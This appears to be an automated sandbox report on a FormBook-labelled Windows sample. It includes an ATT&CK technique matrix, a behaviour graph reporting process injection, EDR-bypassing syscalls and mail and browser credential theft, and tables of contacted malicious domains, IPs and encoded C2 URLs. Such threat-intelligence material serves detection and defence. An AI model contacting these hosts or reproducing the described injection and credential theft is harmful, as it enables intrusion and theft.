                Virtualization/Sandbox Evasion                		Security Account Manager51
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588694 Sample: BalphRTkPS.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 31 www.aziziyeescortg.xyz 2->31 33 www.zoomlive.live 2->33 35 10 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 4 other signatures 2->53 10 BalphRTkPS.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\AppData\...\BalphRTkPS.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 BalphRTkPS.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 ikSQhwOmrrnfH.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 ieUnatt.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 ikSQhwOmrrnfH.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 appsolucao.shop 84.32.84.32, 50005, 50006, 50007 NTT-LT-ASLT Lithuania 23->37 39 www.zoomlive.live 154.208.202.225, 50009, 50010, 50011 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 23->39 41 9 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                BalphRTkPS.exe71%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                BalphRTkPS.exe68%VirustotalBrowse
                BalphRTkPS.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.appsolucao.shop/qt4m/?9PZt=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&I8A=fF8h_X3X0TB100%Avira URL Cloudmalware
                http://digi-searches.com/px.js?ch=10%Avira URL Cloudsafe
                http://www.kkpmoneysocial.top/86am/0%Avira URL Cloudsafe
                http://www.muasamgiare.click/bsye/100%Avira URL Cloudmalware
                http://www.123hellodrive.shop/vc3u/100%Avira URL Cloudmalware
                http://www.happyjam.life/4t49/?I8A=fF8h_X3X0TB&9PZt=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=100%Avira URL Cloudmalware
                http://www.guacamask.online/__media__/js/trademark.php?d=guacamask.online&type=ns0%Avira URL Cloudsafe
                http://digi-searches.com/px.js?ch=20%Avira URL Cloudsafe
                http://www.zoomlive.live/k6vm/?I8A=fF8h_X3X0TB&9PZt=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY=0%Avira URL Cloudsafe
                https://moneyeasilylso.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                https://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK100%Avira URL Cloudmalware
                http://www.Guacamask.online0%Avira URL Cloudsafe
                http://www.123hellodrive.shop/vc3u/?9PZt=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&I8A=fF8h_X3X0TB100%Avira URL Cloudmalware
                http://www.kkpmoneysocial.top/86am/?9PZt=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&I8A=fF8h_X3X0TB0%Avira URL Cloudsafe
                http://digi-searches.com/EMI.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4kDJLB%20%Avira URL Cloudsafe
                https://moneyeasilyijy.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                https://moneyeasilyywe.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                http://www.7261ltajbc.bond/vt4e/?I8A=fF8h_X3X0TB&9PZt=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY=0%Avira URL Cloudsafe
                http://www.guacamask.online/__media__/design/underconstructionnotice.php?d=guacamask.online0%Avira URL Cloudsafe
                http://www.aziziyeescortg.xyz0%Avira URL Cloudsafe
                http://www.dietcoffee.online/725g/0%Avira URL Cloudsafe
                http://digi-searches.com/Alesis_DM10.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC0%Avira URL Cloudsafe
                http://www.guacamask.online/v2ut/0%Avira URL Cloudsafe
                http://www.aziziyeescortg.xyz/2pcx/0%Avira URL Cloudsafe
                http://www.dietcoffee.online/725g/?9PZt=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&I8A=fF8h_X3X0TB0%Avira URL Cloudsafe
                https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                http://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TB100%Avira URL Cloudmalware
                http://www.zoomlive.live/k6vm/0%Avira URL Cloudsafe
                http://digi-searches.com/DAT_to_MP3.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC40%Avira URL Cloudsafe
                http://www.appsolucao.shop/qt4m/100%Avira URL Cloudmalware
                http://www.happyjam.life/4t49/100%Avira URL Cloudmalware
                http://digi-searches.com/sk-logabpstatus.php?a=MWlFQ2d5amYxYkhvc2pKQXl3UXEzUFhuMVFMYXlyY3I5aGZUSVNHc0%Avira URL Cloudsafe
                http://digi-searches.com/Camas.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4kDJLB0%Avira URL Cloudsafe
                http://digi-searches.com/The_Associates.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%20%Avira URL Cloudsafe
                https://www.kkpmoneysocial.top0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                123hellodrive.shop
                		84.32.84.32
                		truetrue
                  		unknown
                  www.aziziyeescortg.xyz
                  		104.21.32.1
                  		truefalse
                    		high
                    dns.ladipage.com
                    		18.139.62.226
                    		truefalse
                      		high
                      www.guacamask.online
                      		208.91.197.27
                      		truefalse
                        		high
                        www.zoomlive.live
                        		154.208.202.225
                        		truetrue
                          		unknown
                          www.kkpmoneysocial.top
                          		104.21.112.1
                          		truetrue
                            		unknown
                            www.dietcoffee.online
                            		77.68.64.45
                            		truefalse
                              		high
                              appsolucao.shop
                              		84.32.84.32
                              		truetrue
                                		unknown
                                www.7261ltajbc.bond
                                		154.12.28.184
                                		truefalse
                                  		high
                                  www.happyjam.life
                                  		209.74.77.107
                                  		truefalse
                                    		high
                                    www.muasamgiare.click
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.artkub.net
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.123hellodrive.shop
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.appsolucao.shop
                                          		unknown
                                          		unknownfalse
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.appsolucao.shop/qt4m/?9PZt=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&I8A=fF8h_X3X0TBtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.happyjam.life/4t49/?I8A=fF8h_X3X0TB&9PZt=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.muasamgiare.click/bsye/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.123hellodrive.shop/vc3u/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.kkpmoneysocial.top/86am/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.zoomlive.live/k6vm/?I8A=fF8h_X3X0TB&9PZt=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY=true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.123hellodrive.shop/vc3u/?9PZt=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&I8A=fF8h_X3X0TBtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.kkpmoneysocial.top/86am/?9PZt=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&I8A=fF8h_X3X0TBtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.7261ltajbc.bond/vt4e/?I8A=fF8h_X3X0TB&9PZt=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY=true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.dietcoffee.online/725g/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.guacamask.online/v2ut/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.aziziyeescortg.xyz/2pcx/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TBtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.zoomlive.live/k6vm/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.dietcoffee.online/725g/?9PZt=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&I8A=fF8h_X3X0TBtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.appsolucao.shop/qt4m/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.happyjam.life/4t49/true
                                            • Avira URL Cloud: malware
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://dts.gnpge.comikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://moneyeasilylso.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4015602502.0000000005C78000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.guacamask.online/__media__/js/trademark.php?d=guacamask.online&type=nsieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdn.consentmanager.netieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://i2.cdn-image.com/__media__/pics/28903/search.png)ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://digi-searches.com/px.js?ch=1ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://digi-searches.com/px.js?ch=2ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jKieUnatt.exe, 00000008.00000002.4015602502.0000000005AE6000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003296000.00000004.00000001.00040000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://digi-searches.com/EMI.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4kDJLB%2ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.Guacamask.onlineieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://delivery.consentmanager.netieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://moneyeasilyijy.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4015602502.0000000005C78000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://moneyeasilyywe.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4015602502.0000000005C78000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.aziziyeescortg.xyzikSQhwOmrrnfH.exe, 0000000A.00000002.4016477333.00000000051AE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.guacamask.online/__media__/design/underconstructionnotice.php?d=guacamask.onlineieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://digi-searches.com/Alesis_DM10.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtCieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4015602502.0000000005C78000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.ecosia.org/newtab/ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ac.ecosia.org/autocomplete?q=ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://i2.cdn-image.com/__media__/pics/29590/bg1.png)ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
